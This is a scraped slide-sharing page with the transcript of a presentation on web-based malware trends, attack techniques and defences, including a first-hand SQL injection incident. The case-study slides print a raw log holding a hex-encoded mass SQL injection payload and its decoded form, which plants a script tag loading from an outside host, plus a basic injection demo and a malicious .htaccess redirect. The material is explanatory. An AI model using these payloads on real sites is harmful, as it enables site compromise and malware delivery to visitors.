web based malware menace spreading fast l.
Download
Skip this Video
Loading SlideShow in 5 Seconds..
Web-Based Malware Menace Spreading Fast PowerPoint Presentation
Download Presentation
Web-Based Malware Menace Spreading Fast

Loading in 2 Seconds...

play fullscreen
1 / 31

Web-Based Malware Menace Spreading Fast - PowerPoint PPT Presentation


  • 115 Views
  • Uploaded on

Web-Based Malware Menace Spreading Fast. Garry Bennett Marcelo Berger Kelley Gambera Elsa Madrigal David Pessis Chuck Roth Fred Salchli. Presented By:. Malware Behavior is Changing . Malware no longer exclusive to malicious sites

loader
I am the owner, or an agent authorized to act on behalf of the owner, of the copyrighted work described.
capcha
Download Presentation

PowerPoint Slideshow about 'Web-Based Malware Menace Spreading Fast' - oihane


An Image/Link below is provided (as is) to download presentation

Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author.While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server.


- - - - - - - - - - - - - - - - - - - - - - - - - - E N D - - - - - - - - - - - - - - - - - - - - - - - - - -
Presentation Transcript
web based malware menace spreading fast
Web-Based Malware Menace Spreading Fast

Garry Bennett

Marcelo Berger

Kelley Gambera

Elsa Madrigal

David Pessis

Chuck Roth

Fred Salchli

Presented By:

malware behavior is changing
Malware Behavior is Changing
  • Malware no longer exclusive to malicious sites
  • Malware making its way to end user machine with no user interaction required
  • Malware establishing presence on end user machine
  • There has been explosive growth in new malicious code signatures

Table 1. New malicious code signatures

Source: Symantec Corporation

interesting trends
Interesting Trends
  • Malware are targeting mainstream sites
    • In 2008, Economist.com and MLB.com were both hit
      • Malware authors used DoubleClicks ad-serving software
      • Unsuspecting users clicked on what looked to be legitimate ads, but were actually clicking on a Trojan which installed itself on the user’s hard drive to collect personal information
  • Malware authors are now looking for a bigger audience
    • Mainstream sites provide this base
    • Users who go to these sites are less likely to be concerned about being the victim of malware attack
      • This is an increasing problem since the notion of being safe if one visits good sites no longer holds true
  • Web servers have evolved into complex code
    • No longer a static page
    • Third-party hosted material
    • Network layer communication and exposed weakness
attack techniques
Attack Techniques
  • SQL injection
  • Malicious advertisements
  • Search engine result redirection
  • Attacks on backend virtual hosting companies
  • Vulnerabilities in Web server or forum hosting software
  • Cross-site scripting (XSS) attacks
attacks not mentioned in paper
Attacks Not Mentioned in Paper
  • Sniffing & Interception (HTTP vs. HTTPS)
  • DNS Server Vulnerability Exploits
    • Allow malicious sites to be served
    • Authenticity Attacks
more popular attack techniques sql injection
More Popular Attack Techniques: SQL Injection
  • Large, high-traffic sites have databases running in background
  • Read/write user interaction
  • Security must extend to databases and data
  • How it works:
    • Identifies input form vulnerabilities
    • Hacker inserts additional SQL instructions
    • Hacker can then navigate database and add mal content
      • Hidden links
      • E.g. Trojan.Asprox
sql injection attack at duo
SQL Injection : Attack at Duo!
  • Longstanding Client
  • Client merged with another company that had an existing e-commerce application
  • We hesitantly agreed to integrate and host the e-commerce application
  • Code review and testing indicated security problems
    • Client pushed back on risk assessment and claimed e-commerce site would be retired in very near future
  • Two years later ...

7

sql injection
SQL Injection
  • First Order Attack
    • Attacker gains access to the database and can perform DML and/or DDL commands
  • Second Order Attack
    • Attacker inserts data into the database
  • Our attacker did both
    • Client called to report strange links appearing within the product pages of their site

8

sql injection raw iis log
SQL Injection: Raw IIS Log

2008-04-12 17:59:39 W3SVC658304687 WEB14A POST /productcart/pc/viewCat_P.asp idCategory=57;DECLARE @S NVARCHAR(4000);SET @S=

CAST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D00310036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D0030002900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F007700770077002E006100730070006400650072002E0063006F006D002F0031002E006A0073003E003C002F007300630072006900700074003E0027002700270029004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F0043007500720073006F007200 AS NVARCHAR(4000));EXEC(@S);-- 80 - 125.65.77.25 HTTP/1.0 Mozilla/3.0+(compatible;+Indy+Library) - - www.clientname.com 200 0 0 471 2377 2562

9

sql injection 1st order attack
SQL Injection: 1st Order Attack

POST /productcart/pc/viewCat_P.asp idCategory=57;

DECLARE @S NVARCHAR(4000);SET @S= “

DECLARE @T varchar(255),@C varchar(255)

DECLARE Table_Cursor CURSOR FOR

select a.name,b.name

from sysobjects a,syscolumns b

where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)”

AS NVARCHAR(4000));EXEC(@S);

10

sql injection 2nd order attack
SQL Injection: 2nd Order Attack

OPEN Table_Cursor

FETCH NEXT FROM Table_Cursor

INTO @T,@C WHILE(@@FETCH_STATUS=0)

BEGIN exec('update ['+@T+']

set ['+@C+']=

rtrim(convert(varchar,['+@C+']))+

''<script src=http://www.axxxr.com/1.js></script>''')

FETCH NEXT FROM Table_Cursor INTO @T,@C

END

CLOSE Table_Cursor

DEALLOCATE Table_Cursor

11

sql injection remediation
SQL Injection: Remediation
  • We immediately shut down the application
  • We built a scrubber which scanned database tables for signature and removed malicious calls
  • E commerce site was disintegrated from main site
  • Unhappy client; Unhappy service provider

12

slide13

More Popular Attack Techniques: Malicious Ads

  • Malware delivered via what appears to be real ad
  • Issues:
    • Not all

advertisers validate the ads hosted on

legitimate sites

    • The nature of advertising/online

publishing mechanisms dynamic and

automated, thus difficult to trace

  • Authored using JavaScript
    • Functions can be easily misused to silently redirect user to malicious page regardless if hosting site remains clean
  • Ads are hard to detect because they quickly rotate
    • Rotate based on search parameters and/or end-user geography
    • Web site and ad publishers are unaware that ads contain malware
slide14

More Popular Attack Techniques: Malicious Ads

  • How Malicious ads work:
    • Pop up over a web site and redirect user to web page filled with malicious software
    • Entices user to click a link, which results in loading of malicious web site
    • Auto-redirects often utilize Flash technology whereas click-throughs use JavaScript or ActiveX to create pop up with clickable options

Additional Source: Smart Computing, “How to Get Rid of Malicious Ads,” May 2008

http://www.smartcomputing.com/editorial/article.asp?article=articles%2F2008%2Fs1905%2F25s05%2F25s05.asp

slide15

More Popular Attack Techniques: Search Engine Result Redirection

  • Poisoned keywords related to popular searches
    • Metatags in web pages used to perform search engine optimization
    • Example: Easter verse, Easter verse poems, Easter greeting card verses
  • Re-directs to Malware Sites
    • Malware is downloaded
    • Misleading Apps are downloaded: anti-virus, windows updates, etc.
  • Detection Avoidance:
    • Referrer checking: avoid researchers who could be investigating the referral to the site
    • Modify HTTP Headers to avoid caching of pages
      • No-store, No-cache

Source: http://cyberinsecure.com/easter-related-search-engine-results-poisoned-redirect-users-to-malicious-applications/

more popular attack techniques backend virtual hosting companies
More Popular Attack Techniques: Backend Virtual Hosting Companies
  • Virtual Hosting Companies provide Web server hosting services to other companies or individuals
  • Attacking Virtual Hosts providers hackers with avenue to infect multiple sites associated with hosts
    • GoDaddy.com DDoS Attack: Hackers

knocked down number of cliet Web sites

for several hours in 2007

  • Techniques for compromising legitimate client Web sites:
    • Exploit applications on host to inject malicious code (HTML – iframes), and host then injects same code into client sites
    • DNS Spoofing attack using virtual Host name
how malware authors reach users
How Malware Authors Reach Users
  • Get on to the user’s computer automatically
    • DNS cache poisoning
    • Drive by download
    • Software vulnerabilities
    • Web attack toolkits
    • Cat and mouse game
    • Obfuscation
    • Dynamically changing URLs and malware
    • Clickjacking
  • Get on to the user’s computer with help from the user
    • Fake codec
    • Malicious P2P files
    • Mal ads
    • Fake scanner web page
    • Blogs
drive by download
Drive By Download
  • User just browses site and executable content is auto-downloaded onto user computer without their knowledge
    • True Four Years Ago… Browsers are more defensive today
    • Degrees of insecurity according to corporate policies
      • Some apps only supported by older browser versions
  • No user interaction required
  • “Good” web sites are targeted by attackers to establish user trust
  • Issue:
    • OS and browser may have latest patches but multimedia plug-ins and doc viewers are out of date and vulnerable
  • Attack method:
    • Hidden IFrame causes user browser to silently pull mal content
    • Mal authors are then able to pull OS, browser, etc. vulnerabilities and eventually pull personal information

Entire attack is invisible to user

other automatic attack methods
Other Automatic Attack Methods
  • Software vulnerabilities
    • “Bugs” or flaws in applications
    • Attacker can compromise system on which software is installed
  • Web attack toolkits
    • Off-the-shelf software written to probe user’s computer and automatically exploit security holes
  • Obfuscation
    • Encryption of malcode, typically in JavaScript
  • Dynamically changing URLs and malware
    • Malicious domains which appear to be real ones associated with search engine statistics
  • Clickjacking
    • Attacker puts invisible layer on Web page and user unknowingly clicks “fake” buttons, links to malware
older detection techniques no longer work
Older Detection Techniques No Longer Work
  • Older, signature-based antivirus-only detection techniques are far less effective
  • Multimedia, reader, browser, and third-party software vulnerabilities are hard to detect using traditional virus signatures
    • Traditional antivirus software only knows how to search in files, not network
    • Attacks are invisible
  • New methods for detection are necessary
  • Security is heavily dependent on user’s habits  i.e. needs to keep up with patches, security updates, etc.
  • Security lockdown is practiced by website owners who have high stakes in secure web transactions
user assisted attack methods
User-Assisted Attack Methods
  • Social engineering
  • People are tricked into performing actions
  • Examples:
    • Fake codec
      • Software that can decode a binary file and reconstitute a version of the original audio or video
      • “Tempting” content gives malware authors the ability to get users to install new codec to reach desired content
      • Screenshot shows fake codec to install video, but instead it’s malware
        • Trojan is installed and infects user’s computer
    • Malicious P2P files
      • Files using celebrity names or popular brand names
user assisted attack methods cont d
User-Assisted Attack Methods (cont’d)
  • Examples:
    • Malicious ads
      • One of the most blatant techniques
      • Direct advertisement of malware to unsuspecting users (in contrast to using actual product/company names)
      • E.g. Fake copy of a newly-released game
    • Fake scanner web page
      • Leverage JavaScript capabilities of a browser
      • Content appears to be legitimate OS alert notification
      • A “scare tactic” approach to get users to execute malware
    • Blogs
      • Bogus links which point to malware
symantec top web threats 2008
Symantec Top Web Threats 2008
  • Drive-by downloads
  • Obfuscation
  • Targeting browser plug-ins instead of just browser
  • Misleading apps
  • SQL injection in mainstream sites
  • Unique and targeted malware
  • ‘Polymorphing’ Tools
new threats for 2009 and beyond
New Threats for 2009 and Beyond
  • Bogus services
    • Legal, financial, car transport
  • “Mule” recruitment sites
    • Spam
    • Professional-looking sites
  • Social networking vulnerabilities with Web 2.0**
    • Hacked accounts
    • Cross-Site Scripting (XSS)
    • Cross Site Request Forgery (CSRF)
    • Phishing
    • Information Leakage
    • Injection flaws (Javascript, XML, Xpath, JSON)
    • Information integrity (i.e. wrong entries on wikipedia)
    • Insufficient anti-automation
      • vulnerable to brute force and CSRF attacks
  • High-visibility news events
    • Quick distribution of malware
  • Replacement of email attachments with hyperlinks

Twitter CSRF Attack

**Source: Top Web 2.0 Security Threats, Secure Enterprise 2.0 Forum

methods of defense
Methods of Defense
  • Techniques for Counter-Acting Web-based Attacks
  • User-awareness (don’t click on anything funny)
    • Don’t download apps you don’t trust
    • Keep your OS updated
  • Use anti-phishing, malware, spam software

No single silver bullet…

Just a bunch of silver bb’s…

sql injection example
SQL Injection Example

// a good user's name

$name = "timmy";

$query = "SELECT * FROM customers WHERE username = '$name'";

echo "Normal: " . $query . "<br />";

// user input that uses SQL Injection

$name_bad = "' OR 1'";

// our MySQL query builder, however, not a very safe one

$query_bad = "SELECT * FROM customers WHERE username = '$name_bad'";

sql injection example cont
SQL Injection Example - Cont.

// display what the new query will look like, with injection echo "Injection: " . $query_bad;

Normal: SELECT * FROM customers WHERE username = 'timmy‘

Injection: SELECT * FROM customers WHERE username = '' OR 1''

slide29

More Popular Attack Techniques: Search Engine Results Redirection

  • Legitimate sites that have been hacked to redirect to various rogue anti-malware “scan” sites
  • The malicious redirect only occurs when a user arrives at the site via search engine results
  • Visiting the sites directly

(i.e. via a bookmark or manually

entering the address) results in

no redirect

  • Site owners’ visiting their site

directly won’t see any evidence

of the redirect

  • Since many sites receive a majority of their traffic from search engines, that large majority of users will keep getting redirected to the malicious site
more popular attack techniques search engine result redirection example
More Popular Attack Techniques: Search Engine Result Redirection Example

The root cause of many of these hacks is a maliciously modified .htaccess file commonly used on Apache web servers

RewriteEngine On

RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC]

...

RewriteRule .* http://badsite-omitted/ [R=301,L]

In some cases it’s replaced completely, in other cases the bad rules are added to the existing contents.